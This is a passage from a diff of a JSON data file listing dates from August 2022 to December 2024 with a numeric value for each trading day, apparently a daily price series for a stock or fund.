307.0858459472656 + ], + [ + "2022-08-03", + 315.4485778808594 + ], + [ + "2022-08-04", + 316.9236755371094 + ], + [ + "2022-08-05", + 314.3348083496094 + ], + [ + "2022-08-08", + 313.3188171386719 + ], + [ + "2022-08-09", + 309.7724609375 + ], + [ + "2022-08-10", + 318.4184265136719 + ], + [ + "2022-08-11", + 316.61114501953125 + ], + [ + "2022-08-12", + 322.7757568359375 + ], + [ + "2022-08-15", + 325.3841857910156 + ], + [ + "2022-08-16", + 324.6221008300781 + ], + [ + "2022-08-17", + 320.9195251464844 + ], + [ + "2022-08-18", + 321.6912841796875 + ], + [ + "2022-08-19", + 315.419189453125 + ], + [ + "2022-08-22", + 307.1150817871094 + ], + [ + "2022-08-23", + 306.8611755371094 + ], + [ + "2022-08-24", + 307.7502136230469 + ], + [ + "2022-08-25", + 313.1917419433594 + ], + [ + "2022-08-26", + 300.3546142578125 + ], + [ + "2022-08-29", + 297.3943786621094 + ], + [ + "2022-08-30", + 294.0825500488281 + ], + [ + "2022-08-31", + 292.37286376953125 + ], + [ + "2022-09-01", + 292.4999084472656 + ], + [ + "2022-09-02", + 288.3674621582031 + ], + [ + "2022-09-06", + 286.2961730957031 + ], + [ + "2022-09-07", + 292.07977294921875 + ], + [ + "2022-09-08", + 293.5940856933594 + ], + [ + "2022-09-09", + 300.0127258300781 + ], + [ + "2022-09-12", + 303.5785217285156 + ], + [ + "2022-09-13", + 286.9312744140625 + ], + [ + "2022-09-14", + 289.20758056640625 + ], + [ + "2022-09-15", + 284.3912048339844 + ], + [ + "2022-09-16", + 282.6521911621094 + ], + [ + "2022-09-19", + 284.8533935546875 + ], + [ + "2022-09-20", + 282.5827331542969 + ], + [ + "2022-09-21", + 277.52276611328125 + ], + [ + "2022-09-22", + 274.1070861816406 + ], + [ + "2022-09-23", + 269.6441955566406 + ], + [ + "2022-09-26", + 268.5284423828125 + ], + [ + "2022-09-27", + 268.6360778808594 + ], + [ + "2022-09-28", + 273.9798583984375 + ], + [ + "2022-09-29", + 266.0816650390625 + ], + [ + "2022-09-30", + 261.56982421875 + ], + [ + "2022-10-03", + 267.7063903808594 + ], + [ + "2022-10-04", + 276.1232604980469 + ], + [ + "2022-10-05", + 275.9764404296875 + ], + [ + "2022-10-06", + 273.8037414550781 + ], + [ + "2022-10-07", + 263.37066650390625 + ], + [ + "2022-10-10", + 260.7379455566406 + ], + [ + "2022-10-11", + 257.15582275390625 + ], + [ + "2022-10-12", + 257.06781005859375 + ], + [ + "2022-10-13", + 263.0965881347656 + ], + [ + "2022-10-14", + 255.18865966796875 + ], + [ + "2022-10-17", + 263.6153869628906 + ], + [ + "2022-10-18", + 265.70001220703125 + ], + [ + "2022-10-19", + 264.7310485839844 + ], + [ + "2022-10-20", + 263.3804626464844 + ], + [ + "2022-10-21", + 269.55609130859375 + ], + [ + "2022-10-24", + 272.5215759277344 + ], + [ + "2022-10-25", + 278.158935546875 + ], + [ + "2022-10-26", + 272.0126647949219 + ], + [ + "2022-10-27", + 267.0603942871094 + ], + [ + "2022-10-28", + 275.2326354980469 + ], + [ + "2022-10-31", + 272.0322570800781 + ], + [ + "2022-11-01", + 269.25262451171875 + ], + [ + "2022-11-02", + 260.0235290527344 + ], + [ + "2022-11-03", + 254.94398498535156 + ], + [ + "2022-11-04", + 259.04473876953125 + ], + [ + "2022-11-07", + 261.892822265625 + ], + [ + "2022-11-08", + 263.8013610839844 + ], + [ + "2022-11-09", + 257.7137145996094 + ], + [ + "2022-11-10", + 276.73004150390625 + ], + [ + "2022-11-11", + 281.8290710449219 + ], + [ + "2022-11-14", + 279.36279296875 + ], + [ + "2022-11-15", + 283.2286682128906 + ], + [ + "2022-11-16", + 279.36279296875 + ], + [ + "2022-11-17", + 278.74615478515625 + ], + [ + "2022-11-18", + 278.7560119628906 + ], + [ + "2022-11-21", + 275.8883972167969 + ], + [ + "2022-11-22", + 279.8619384765625 + ], + [ + "2022-11-23", + 282.6708068847656 + ], + [ + "2022-11-25", + 280.8113098144531 + ], + [ + "2022-11-28", + 276.6909484863281 + ], + [ + "2022-11-29", + 274.596435546875 + ], + [ + "2022-11-30", + 287.11407470703125 + ], + [ + "2022-12-01", + 287.46649169921875 + ], + [ + "2022-12-02", + 286.3213806152344 + ], + [ + "2022-12-05", + 281.5159606933594 + ], + [ + "2022-12-06", + 275.6828308105469 + ], + [ + "2022-12-07", + 274.557373046875 + ], + [ + "2022-12-08", + 277.806640625 + ], + [ + "2022-12-09", + 276.0351257324219 + ], + [ + "2022-12-12", + 279.499755859375 + ], + [ + "2022-12-13", + 282.5044250488281 + ], + [ + "2022-12-14", + 280.40997314453125 + ], + [ + "2022-12-15", + 270.99481201171875 + ], + [ + "2022-12-16", + 268.4110412597656 + ], + [ + "2022-12-19", + 264.63885498046875 + ], + [ + "2022-12-20", + 264.432861328125 + ], + [ + "2022-12-21", + 268.26873779296875 + ], + [ + "2022-12-22", + 261.7055358886719 + ], + [ + "2022-12-23", + 262.2941589355469 + ], + [ + "2022-12-27", + 258.5857238769531 + ], + [ + "2022-12-28", + 255.17172241210938 + ], + [ + "2022-12-29", + 261.3916015625 + ], + [ + "2022-12-30", + 261.2346496582031 + ], + [ + "2023-01-03", + 259.46875 + ], + [ + "2023-01-04", + 260.704833984375 + ], + [ + "2023-01-05", + 256.6236572265625 + ], + [ + "2023-01-06", + 263.7069091796875 + ], + [ + "2023-01-09", + 265.4139099121094 + ], + [ + "2023-01-10", + 267.6605529785156 + ], + [ + "2023-01-11", + 272.29107666015625 + ], + [ + "2023-01-12", + 273.7626647949219 + ], + [ + "2023-01-13", + 275.64630126953125 + ], + [ + "2023-01-17", + 276.2055358886719 + ], + [ + "2023-01-18", + 272.6148376464844 + ], + [ + "2023-01-19", + 269.9365539550781 + ], + [ + "2023-01-20", + 277.3238525390625 + ], + [ + "2023-01-23", + 283.48486328125 + ], + [ + "2023-01-24", + 282.9060363769531 + ], + [ + "2023-01-25", + 282.2782287597656 + ], + [ + "2023-01-26", + 287.78192138671875 + ], + [ + "2023-01-27", + 290.6466369628906 + ], + [ + "2023-01-30", + 284.7700500488281 + ], + [ + "2023-01-31", + 289.0376281738281 + ], + [ + "2023-02-01", + 295.21826171875 + ], + [ + "2023-02-02", + 305.81365966796875 + ], + [ + "2023-02-03", + 300.3785400390625 + ], + [ + "2023-02-06", + 297.8376770019531 + ], + [ + "2023-02-07", + 304.0085144042969 + ], + [ + "2023-02-08", + 298.6028747558594 + ], + [ + "2023-02-09", + 295.9639587402344 + ], + [ + "2023-02-10", + 294.0213928222656 + ], + [ + "2023-02-13", + 298.7304382324219 + ], + [ + "2023-02-14", + 300.93780517578125 + ], + [ + "2023-02-15", + 303.2433776855469 + ], + [ + "2023-02-16", + 297.55322265625 + ], + [ + "2023-02-17", + 295.4537353515625 + ], + [ + "2023-02-21", + 288.4588317871094 + ], + [ + "2023-02-22", + 288.6746826171875 + ], + [ + "2023-02-23", + 291.196044921875 + ], + [ + "2023-02-24", + 286.32012939453125 + ], + [ + "2023-02-27", + 288.37054443359375 + ], + [ + "2023-02-28", + 287.9977111816406 + ], + [ + "2023-03-01", + 285.68243408203125 + ], + [ + "2023-03-02", + 288.04681396484375 + ], + [ + "2023-03-03", + 294.00177001953125 + ], + [ + "2023-03-06", + 294.3353576660156 + ], + [ + "2023-03-07", + 290.72503662109375 + ], + [ + "2023-03-08", + 292.1770324707031 + ], + [ + "2023-03-09", + 287.1147155761719 + ], + [ + "2023-03-10", + 283.0826110839844 + ], + [ + "2023-03-13", + 285.18212890625 + ], + [ + "2023-03-14", + 291.73553466796875 + ], + [ + "2023-03-15", + 293.2659912109375 + ], + [ + "2023-03-16", + 300.9967041015625 + ], + [ + "2023-03-17", + 299.5741882324219 + ], + [ + "2023-03-20", + 300.6372985839844 + ], + [ + "2023-03-21", + 304.9311218261719 + ], + [ + "2023-03-22", + 300.7846984863281 + ], + [ + "2023-03-23", + 304.3513488769531 + ], + [ + "2023-03-24", + 305.47161865234375 + ], + [ + "2023-03-27", + 303.378662109375 + ], + [ + "2023-03-28", + 301.7672119140625 + ], + [ + "2023-03-29", + 307.2696228027344 + ], + [ + "2023-03-30", + 310.1780700683594 + ], + [ + "2023-03-31", + 315.3365783691406 + ], + [ + "2023-04-03", + 314.57012939453125 + ], + [ + "2023-04-04", + 313.5090026855469 + ], + [ + "2023-04-05", + 310.41387939453125 + ], + [ + "2023-04-06", + 312.5066833496094 + ], + [ + "2023-04-10", + 312.3298645019531 + ], + [ + "2023-04-11", + 310.3254089355469 + ], + [ + "2023-04-12", + 307.58404541015625 + ], + [ + "2023-04-13", + 313.60723876953125 + ], + [ + "2023-04-14", + 313.0177001953125 + ], + [ + "2023-04-17", + 313.282958984375 + ], + [ + "2023-04-18", + 313.3025817871094 + ], + [ + "2023-04-19", + 313.1552429199219 + ], + [ + "2023-04-20", + 310.76763916015625 + ], + [ + "2023-04-21", + 311.091796875 + ], + [ + "2023-04-24", + 310.4433288574219 + ], + [ + "2023-04-25", + 304.5872497558594 + ], + [ + "2023-04-26", + 306.43438720703125 + ], + [ + "2023-04-27", + 314.7666931152344 + ], + [ + "2023-04-28", + 316.9381408691406 + ], + [ + "2023-05-01", + 316.5745544433594 + ], + [ + "2023-05-02", + 313.8135681152344 + ], + [ + "2023-05-03", + 311.760009765625 + ], + [ + "2023-05-04", + 310.6595153808594 + ], + [ + "2023-05-05", + 317.26239013671875 + ], + [ + "2023-05-08", + 318.0484924316406 + ], + [ + "2023-05-09", + 316.0342102050781 + ], + [ + "2023-05-10", + 319.4731750488281 + ], + [ + "2023-05-11", + 320.51470947265625 + ], + [ + "2023-05-12", + 319.3651123046875 + ], + [ + "2023-05-15", + 321.0944519042969 + ], + [ + "2023-05-16", + 321.45794677734375 + ], + [ + "2023-05-17", + 325.3489074707031 + ], + [ + "2023-05-18", + 331.39178466796875 + ], + [ + "2023-05-19", + 330.64501953125 + ], + [ + "2023-05-22", + 331.7552795410156 + ], + [ + "2023-05-23", + 327.5499267578125 + ], + [ + "2023-05-24", + 325.86968994140625 + ], + [ + "2023-05-25", + 333.799072265625 + ], + [ + "2023-05-26", + 342.3277893066406 + ], + [ + "2023-05-30", + 343.8802795410156 + ], + [ + "2023-05-31", + 341.9248352050781 + ], + [ + "2023-06-01", + 345.8748779296875 + ], + [ + "2023-06-02", + 348.4687805175781 + ], + [ + "2023-06-05", + 348.7144775390625 + ], + [ + "2023-06-06", + 348.65557861328125 + ], + [ + "2023-06-07", + 342.7404479980469 + ], + [ + "2023-06-08", + 346.9950256347656 + ], + [ + "2023-06-09", + 348.3215026855469 + ], + [ + "2023-06-12", + 354.20703125 + ], + [ + "2023-06-13", + 356.9288024902344 + ], + [ + "2023-06-14", + 359.5227966308594 + ], + [ + "2023-06-15", + 363.8068542480469 + ], + [ + "2023-06-16", + 361.51739501953125 + ], + [ + "2023-06-20", + 360.9998474121094 + ], + [ + "2023-06-21", + 356.0802307128906 + ], + [ + "2023-06-22", + 360.2816162109375 + ], + [ + "2023-06-23", + 356.7100524902344 + ], + [ + "2023-06-26", + 351.9280700683594 + ], + [ + "2023-06-27", + 357.97918701171875 + ], + [ + "2023-06-28", + 358.6778259277344 + ], + [ + "2023-06-29", + 357.95953369140625 + ], + [ + "2023-06-30", + 363.4793701171875 + ], + [ + "2023-07-03", + 364.3353576660156 + ], + [ + "2023-07-05", + 364.32550048828125 + ], + [ + "2023-07-06", + 361.5508728027344 + ], + [ + "2023-07-07", + 360.3504943847656 + ], + [ + "2023-07-10", + 360.4685363769531 + ], + [ + "2023-07-11", + 362.2494201660156 + ], + [ + "2023-07-12", + 366.82464599609375 + ], + [ + "2023-07-13", + 373.0528564453125 + ], + [ + "2023-07-14", + 372.9740905761719 + ], + [ + "2023-07-17", + 376.4571533203125 + ], + [ + "2023-07-18", + 379.53692626953125 + ], + [ + "2023-07-19", + 379.44830322265625 + ], + [ + "2023-07-20", + 370.70135498046875 + ], + [ + "2023-07-21", + 369.5894775390625 + ], + [ + "2023-07-24", + 370.1798095703125 + ], + [ + "2023-07-25", + 372.68878173828125 + ], + [ + "2023-07-26", + 371.4490966796875 + ], + [ + "2023-07-27", + 370.5635681152344 + ], + [ + "2023-07-28", + 377.3132019042969 + ], + [ + "2023-07-31", + 377.510009765625 + ], + [ + "2023-08-01", + 376.63433837890625 + ], + [ + "2023-08-02", + 368.369384765625 + ], + [ + "2023-08-03", + 367.779052734375 + ], + [ + "2023-08-04", + 366.05718994140625 + ], + [ + "2023-08-07", + 369.1566162109375 + ], + [ + "2023-08-08", + 366.017822265625 + ], + [ + "2023-08-09", + 361.99365234375 + ], + [ + "2023-08-10", + 362.66265869140625 + ], + [ + "2023-08-11", + 360.3504943847656 + ], + [ + "2023-08-14", + 364.3943786621094 + ], + [ + "2023-08-15", + 360.527587890625 + ], + [ + "2023-08-16", + 356.7100524902344 + ], + [ + "2023-08-17", + 352.8136291503906 + ], + [ + "2023-08-18", + 352.3708801269531 + ], + [ + "2023-08-21", + 358.0480651855469 + ], + [ + "2023-08-22", + 357.5364685058594 + ], + [ + "2023-08-23", + 363.17431640625 + ], + [ + "2023-08-24", + 355.4111328125 + ], + [ + "2023-08-25", + 358.1661376953125 + ], + [ + "2023-08-28", + 360.8620910644531 + ], + [ + "2023-08-29", + 368.7433166503906 + ], + [ + "2023-08-30", + 370.7996520996094 + ], + [ + "2023-08-31", + 371.91156005859375 + ], + [ + "2023-09-01", + 371.5179748535156 + ], + [ + "2023-09-05", + 371.9902648925781 + ], + [ + "2023-09-06", + 368.7137451171875 + ], + [ + "2023-09-07", + 366.0768737792969 + ], + [ + "2023-09-08", + 366.5884704589844 + ], + [ + "2023-09-11", + 370.9079284667969 + ], + [ + "2023-09-12", + 366.795166015625 + ], + [ + "2023-09-13", + 368.19232177734375 + ], + [ + "2023-09-14", + 371.203125 + ], + [ + "2023-09-15", + 364.84698486328125 + ], + [ + "2023-09-18", + 365.2273254394531 + ], + [ + "2023-09-19", + 364.4488830566406 + ], + [ + "2023-09-20", + 359.1970520019531 + ], + [ + "2023-09-21", + 352.6148986816406 + ], + [ + "2023-09-22", + 352.66424560546875 + ], + [ + "2023-09-25", + 354.3392333984375 + ], + [ + "2023-09-26", + 349.0183410644531 + ], + [ + "2023-09-27", + 349.8362731933594 + ], + [ + "2023-09-28", + 352.7627258300781 + ], + [ + "2023-09-29", + 353.0188903808594 + ], + [ + "2023-10-02", + 355.9650573730469 + ], + [ + "2023-10-03", + 349.718017578125 + ], + [ + "2023-10-04", + 354.47723388671875 + ], + [ + "2023-10-05", + 353.4327697753906 + ], + [ + "2023-10-06", + 359.3546447753906 + ], + [ + "2023-10-09", + 361.1874084472656 + ], + [ + "2023-10-10", + 363.1876525878906 + ], + [ + "2023-10-11", + 365.7790832519531 + ], + [ + "2023-10-12", + 364.5080261230469 + ], + [ + "2023-10-13", + 359.9261474609375 + ], + [ + "2023-10-16", + 363.9956359863281 + ], + [ + "2023-10-17", + 362.80340576171875 + ], + [ + "2023-10-18", + 358.0442199707031 + ], + [ + "2023-10-19", + 354.6940002441406 + ], + [ + "2023-10-20", + 349.4027404785156 + ], + [ + "2023-10-23", + 350.4570007324219 + ], + [ + "2023-10-24", + 353.8663024902344 + ], + [ + "2023-10-25", + 345.2051086425781 + ], + [ + "2023-10-26", + 338.6231384277344 + ], + [ + "2023-10-27", + 340.2488708496094 + ], + [ + "2023-10-30", + 344.0818786621094 + ], + [ + "2023-10-31", + 345.72735595703125 + ], + [ + "2023-11-01", + 351.7281188964844 + ], + [ + "2023-11-02", + 358.1131896972656 + ], + [ + "2023-11-03", + 362.3205871582031 + ], + [ + "2023-11-06", + 363.7985534667969 + ], + [ + "2023-11-07", + 367.23748779296875 + ], + [ + "2023-11-08", + 367.4739074707031 + ], + [ + "2023-11-09", + 364.6460266113281 + ], + [ + "2023-11-10", + 372.843994140625 + ], + [ + "2023-11-13", + 371.6813659667969 + ], + [ + "2023-11-14", + 379.68231201171875 + ], + [ + "2023-11-15", + 379.968017578125 + ], + [ + "2023-11-16", + 380.2933044433594 + ], + [ + "2023-11-17", + 380.3818664550781 + ], + [ + "2023-11-20", + 385.0129699707031 + ], + [ + "2023-11-21", + 382.7762756347656 + ], + [ + "2023-11-22", + 384.34295654296875 + ], + [ + "2023-11-24", + 383.8010559082031 + ], + [ + "2023-11-27", + 383.466064453125 + ], + [ + "2023-11-28", + 384.4710998535156 + ], + [ + "2023-11-29", + 384.0966491699219 + ], + [ + "2023-11-30", + 383.1310119628906 + ], + [ + "2023-12-01", + 384.2247619628906 + ], + [ + "2023-12-04", + 380.6578063964844 + ], + [ + "2023-12-05", + 381.61358642578125 + ], + [ + "2023-12-06", + 379.40643310546875 + ], + [ + "2023-12-07", + 384.7075500488281 + ], + [ + "2023-12-08", + 386.4220886230469 + ], + [ + "2023-12-11", + 389.7229919433594 + ], + [ + "2023-12-12", + 392.8267822265625 + ], + [ + "2023-12-13", + 397.8224182128906 + ], + [ + "2023-12-14", + 397.4776306152344 + ], + [ + "2023-12-15", + 399.39898681640625 + ], + [ + "2023-12-18", + 401.9146728515625 + ], + [ + "2023-12-19", + 403.9682922363281 + ], + [ + "2023-12-20", + 397.9654541015625 + ], + [ + "2023-12-21", + 402.595947265625 + ], + [ + "2023-12-22", + 403.1982116699219 + ], + [ + "2023-12-26", + 405.6664733886719 + ], + [ + "2023-12-27", + 406.4923095703125 + ], + [ + "2023-12-28", + 406.2947082519531 + ], + [ + "2023-12-29", + 404.5364685058594 + ], + [ + "2024-01-02", + 397.69073486328125 + ], + [ + "2024-01-03", + 393.48260498046875 + ], + [ + "2024-01-04", + 391.4575500488281 + ], + [ + "2024-01-05", + 391.92181396484375 + ], + [ + "2024-01-08", + 400.0220031738281 + ], + [ + "2024-01-09", + 400.8122863769531 + ], + [ + "2024-01-10", + 403.5288391113281 + ], + [ + "2024-01-11", + 404.3685302734375 + ], + [ + "2024-01-12", + 404.5759582519531 + ], + [ + "2024-01-16", + 404.5364685058594 + ], + [ + "2024-01-17", + 402.2544860839844 + ], + [ + "2024-01-18", + 407.9642333984375 + ], + [ + "2024-01-19", + 416.05450439453125 + ], + [ + "2024-01-22", + 416.5978698730469 + ], + [ + "2024-01-23", + 418.3265380859375 + ], + [ + "2024-01-24", + 420.6479187011719 + ], + [ + "2024-01-25", + 421.16162109375 + ], + [ + "2024-01-26", + 418.6525573730469 + ], + [ + "2024-01-29", + 422.939697265625 + ], + [ + "2024-01-30", + 420.1243591308594 + ], + [ + "2024-01-31", + 411.895751953125 + ], + [ + "2024-02-01", + 416.7460021972656 + ], + [ + "2024-02-02", + 423.78924560546875 + ], + [ + "2024-02-05", + 423.2361145019531 + ], + [ + "2024-02-06", + 422.3865051269531 + ], + [ + "2024-02-07", + 426.7330017089844 + ], + [ + "2024-02-08", + 427.52325439453125 + ], + [ + "2024-02-09", + 431.7314147949219 + ], + [ + "2024-02-12", + 430.0422058105469 + ], + [ + "2024-02-13", + 423.3348083496094 + ], + [ + "2024-02-14", + 427.9480285644531 + ], + [ + "2024-02-15", + 429.22235107421875 + ], + [ + "2024-02-16", + 425.330322265625 + ], + [ + "2024-02-20", + 422.11981201171875 + ], + [ + "2024-02-21", + 420.43060302734375 + ], + [ + "2024-02-22", + 432.7390441894531 + ], + [ + "2024-02-23", + 431.4646911621094 + ], + [ + "2024-02-26", + 431.2374267578125 + ], + [ + "2024-02-27", + 432.2746887207031 + ], + [ + "2024-02-28", + 429.9730224609375 + ], + [ + "2024-02-29", + 433.6576232910156 + ], + [ + "2024-03-01", + 440.18719482421875 + ], + [ + "2024-03-04", + 438.61651611328125 + ], + [ + "2024-03-05", + 430.7435302734375 + ], + [ + "2024-03-06", + 433.4502258300781 + ], + [ + "2024-03-07", + 440.0291748046875 + ], + [ + "2024-03-08", + 433.6774597167969 + ], + [ + "2024-03-11", + 432.0672607421875 + ], + [ + "2024-03-12", + 438.260986328125 + ], + [ + "2024-03-13", + 434.8924865722656 + ], + [ + "2024-03-14", + 433.7959899902344 + ], + [ + "2024-03-15", + 428.63946533203125 + ], + [ + "2024-03-18", + 432.72760009765625 + ], + [ + "2024-03-19", + 433.8057556152344 + ], + [ + "2024-03-20", + 438.94921875 + ], + [ + "2024-03-21", + 441.0264587402344 + ], + [ + "2024-03-22", + 441.53094482421875 + ], + [ + "2024-03-25", + 439.9285583496094 + ], + [ + "2024-03-26", + 438.504150390625 + ], + [ + "2024-03-27", + 439.99774169921875 + ], + [ + "2024-03-28", + 439.1866760253906 + ], + [ + "2024-04-01", + 440.1164855957031 + ], + [ + "2024-04-02", + 436.318115234375 + ], + [ + "2024-04-03", + 437.2973937988281 + ], + [ + "2024-04-04", + 430.61083984375 + ], + [ + "2024-04-05", + 435.68511962890625 + ], + [ + "2024-04-08", + 435.813720703125 + ], + [ + "2024-04-09", + 437.426025390625 + ], + [ + "2024-04-10", + 433.60791015625 + ], + [ + "2024-04-11", + 440.53192138671875 + ], + [ + "2024-04-12", + 433.509033203125 + ], + [ + "2024-04-15", + 426.3773498535156 + ], + [ + "2024-04-16", + 426.4168701171875 + ], + [ + "2024-04-17", + 421.2140197753906 + ], + [ + "2024-04-18", + 418.8104553222656 + ], + [ + "2024-04-19", + 410.1455993652344 + ], + [ + "2024-04-22", + 414.2702941894531 + ], + [ + "2024-04-23", + 420.45245361328125 + ], + [ + "2024-04-24", + 421.8767395019531 + ], + [ + "2024-04-25", + 419.8391418457031 + ], + [ + "2024-04-26", + 426.3180236816406 + ], + [ + "2024-04-29", + 428.0489501953125 + ], + [ + "2024-04-30", + 419.9776306152344 + ], + [ + "2024-05-01", + 416.9410095214844 + ], + [ + "2024-05-02", + 422.2625427246094 + ], + [ + "2024-05-03", + 430.7493896484375 + ], + [ + "2024-05-06", + 435.467529296875 + ], + [ + "2024-05-07", + 435.5367736816406 + ], + [ + "2024-05-08", + 435.27960205078125 + ], + [ + "2024-05-09", + 436.2291259765625 + ], + [ + "2024-05-10", + 437.25787353515625 + ], + [ + "2024-05-13", + 438.2667236328125 + ], + [ + "2024-05-14", + 441.08575439453125 + ], + [ + "2024-05-15", + 447.9801025390625 + ], + [ + "2024-05-16", + 447.0700988769531 + ], + [ + "2024-05-17", + 446.85247802734375 + ], + [ + "2024-05-20", + 449.9682312011719 + ], + [ + "2024-05-21", + 450.84857177734375 + ], + [ + "2024-05-22", + 450.7595520019531 + ], + [ + "2024-05-23", + 448.7318420410156 + ], + [ + "2024-05-24", + 452.9752502441406 + ], + [ + "2024-05-28", + 454.6864318847656 + ], + [ + "2024-05-29", + 451.48162841796875 + ], + [ + "2024-05-30", + 446.644775390625 + ], + [ + "2024-05-31", + 445.8138732910156 + ], + [ + "2024-06-03", + 448.20758056640625 + ], + [ + "2024-06-04", + 449.4341125488281 + ], + [ + "2024-06-05", + 458.49462890625 + ], + [ + "2024-06-06", + 458.3363952636719 + ], + [ + "2024-06-07", + 457.9308166503906 + ], + [ + "2024-06-10", + 459.780517578125 + ], + [ + "2024-06-11", + 462.9358825683594 + ], + [ + "2024-06-12", + 468.9992370605469 + ], + [ + "2024-06-13", + 471.54132080078125 + ], + [ + "2024-06-14", + 473.9844665527344 + ], + [ + "2024-06-17", + 479.7907409667969 + ], + [ + "2024-06-18", + 479.9391174316406 + ], + [ + "2024-06-20", + 476.2397766113281 + ], + [ + "2024-06-21", + 474.9637145996094 + ], + [ + "2024-06-24", + 469.55645751953125 + ], + [ + "2024-06-25", + 474.92608642578125 + ], + [ + "2024-06-26", + 475.90692138671875 + ], + [ + "2024-06-27", + 477.1354064941406 + ], + [ + "2024-06-28", + 474.6585693359375 + ], + [ + "2024-07-01", + 477.4425048828125 + ], + [ + "2024-07-02", + 482.4555358886719 + ], + [ + "2024-07-03", + 486.477783203125 + ], + [ + "2024-07-05", + 491.5502014160156 + ], + [ + "2024-07-08", + 492.71923828125 + ], + [ + "2024-07-09", + 493.1452331542969 + ], + [ + "2024-07-10", + 498.2870178222656 + ], + [ + "2024-07-11", + 487.3594665527344 + ], + [ + "2024-07-12", + 490.22265625 + ], + [ + "2024-07-15", + 491.540283203125 + ], + [ + "2024-07-16", + 491.7285461425781 + ], + [ + "2024-07-17", + 477.29388427734375 + ], + [ + "2024-07-18", + 475.03509521484375 + ], + [ + "2024-07-19", + 470.8245544433594 + ], + [ + "2024-07-22", + 477.83880615234375 + ], + [ + "2024-07-23", + 476.1545715332031 + ], + [ + "2024-07-24", + 459.0747375488281 + ], + [ + "2024-07-25", + 454.0121765136719 + ], + [ + "2024-07-26", + 458.6685485839844 + ], + [ + "2024-07-29", + 459.5899658203125 + ], + [ + "2024-07-30", + 453.2790832519531 + ], + [ + "2024-07-31", + 466.69329833984375 + ], + [ + "2024-08-01", + 455.3892822265625 + ], + [ + "2024-08-02", + 444.5806579589844 + ], + [ + "2024-08-05", + 431.32501220703125 + ], + [ + "2024-08-06", + 435.4463806152344 + ], + [ + "2024-08-07", + 430.7305603027344 + ], + [ + "2024-08-08", + 443.9070129394531 + ], + [ + "2024-08-09", + 446.22528076171875 + ], + [ + "2024-08-12", + 447.186279296875 + ], + [ + "2024-08-13", + 458.2821960449219 + ], + [ + "2024-08-14", + 458.4307861328125 + ], + [ + "2024-08-15", + 470.01220703125 + ], + [ + "2024-08-16", + 470.61651611328125 + ], + [ + "2024-08-19", + 476.79852294921875 + ], + [ + "2024-08-20", + 475.79791259765625 + ], + [ + "2024-08-21", + 478.01708984375 + ], + [ + "2024-08-22", + 470.438232421875 + ], + [ + "2024-08-23", + 475.54034423828125 + ], + [ + "2024-08-26", + 470.9236145019531 + ], + [ + "2024-08-27", + 472.3304443359375 + ], + [ + "2024-08-28", + 466.9706726074219 + ], + [ + "2024-08-29", + 466.287109375 + ], + [ + "2024-08-30", + 471.844970703125 + ], + [ + "2024-09-03", + 457.51934814453125 + ], + [ + "2024-09-04", + 456.3304748535156 + ], + [ + "2024-09-05", + 456.7564697265625 + ], + [ + "2024-09-06", + 444.521240234375 + ], + [ + "2024-09-09", + 450.23760986328125 + ], + [ + "2024-09-10", + 454.3985900878906 + ], + [ + "2024-09-11", + 464.26605224609375 + ], + [ + "2024-09-12", + 468.8233337402344 + ], + [ + "2024-09-13", + 470.9236145019531 + ], + [ + "2024-09-16", + 468.8431091308594 + ], + [ + "2024-09-17", + 469.0908203125 + ], + [ + "2024-09-18", + 467.0599060058594 + ], + [ + "2024-09-19", + 478.8691101074219 + ], + [ + "2024-09-20", + 477.9576416015625 + ], + [ + "2024-09-23", + 479.22454833984375 + ], + [ + "2024-09-24", + 481.53619384765625 + ], + [ + "2024-09-25", + 481.982666015625 + ], + [ + "2024-09-26", + 485.60382080078125 + ], + [ + "2024-09-27", + 482.9052734375 + ], + [ + "2024-09-30", + 484.21484375 + ], + [ + "2024-10-01", + 477.4685363769531 + ], + [ + "2024-10-02", + 478.1431579589844 + ], + [ + "2024-10-03", + 477.7860412597656 + ], + [ + "2024-10-04", + 483.4707946777344 + ], + [ + "2024-10-07", + 478.29205322265625 + ], + [ + "2024-10-08", + 485.4351501464844 + ], + [ + "2024-10-09", + 489.2547302246094 + ], + [ + "2024-10-10", + 488.69915771484375 + ], + [ + "2024-10-11", + 489.4630432128906 + ], + [ + "2024-10-14", + 493.5703430175781 + ], + [ + "2024-10-15", + 486.9729309082031 + ], + [ + "2024-10-16", + 487.0324401855469 + ], + [ + "2024-10-17", + 487.3697204589844 + ], + [ + "2024-10-18", + 490.5643005371094 + ], + [ + "2024-10-21", + 491.50677490234375 + ], + [ + "2024-10-22", + 492.0425109863281 + ], + [ + "2024-10-23", + 484.5025329589844 + ], + [ + "2024-10-24", + 488.4312744140625 + ], + [ + "2024-10-25", + 491.4075927734375 + ], + [ + "2024-10-28", + 491.4869384765625 + ], + [ + "2024-10-29", + 496.2093811035156 + ], + [ + "2024-10-30", + 492.459228515625 + ], + [ + "2024-10-31", + 480.0281982421875 + ], + [ + "2024-11-01", + 483.57989501953125 + ], + [ + "2024-11-04", + 482.171142578125 + ], + [ + "2024-11-05", + 488.3221740722656 + ], + [ + "2024-11-06", + 501.5865478515625 + ], + [ + "2024-11-07", + 509.483642578125 + ], + [ + "2024-11-08", + 510.0789489746094 + ], + [ + "2024-11-11", + 509.78131103515625 + ], + [ + "2024-11-12", + 508.85858154296875 + ], + [ + "2024-11-13", + 508.203857421875 + ], + [ + "2024-11-14", + 504.6719970703125 + ], + [ + "2024-11-15", + 492.6477355957031 + ], + [ + "2024-11-18", + 496.0704345703125 + ], + [ + "2024-11-19", + 499.4833068847656 + ], + [ + "2024-11-20", + 499.1955871582031 + ], + [ + "2024-11-21", + 500.9913024902344 + ], + [ + "2024-11-22", + 501.7948913574219 + ], + [ + "2024-11-25", + 502.5885314941406 + ], + [ + "2024-11-26", + 505.28704833984375 + ], + [ + "2024-11-27", + 501.3086853027344 + ], + [ + "2024-11-29", + 505.7136535644531 + ], + [ + "2024-12-02", + 511.21978759765625 + ], + [ + "2024-12-03", + 512.787353515625 + ], + [ + "2024-12-04", + 519.1268920898438 + ], + [ + "2024-12-05", + 517.6883544921875 + ], + [ + "2024-12-06", + 522.3214111328125 + ], + [ + "2024-12-09", + 518.2538452148438 + ], + [ + "2024-12-10", + 516.4879760742188 + ], + [ + "2024-12-11", + 525.7342529296875 + ], + [ + "2024-12-12", + 522.34130859375 + ], + [ + "2024-12-13", + 526.3394775390625 + ], + [ + "2024-12-16", + 533.9190673828125 + ], + [ + "2024-12-17", + 531.56787109375 + ], + [ + "2024-12-18", + 512.3904418945312 + ], + [ + "2024-12-19", + 510.108642578125 + ], + [ + "2024-12-20", + 514.563232421875 + ], + [ + "2024-12-23", + 519.5764770507812 + ], + [ + "2024-12-24", + 526.6217651367188 + ], + [ + 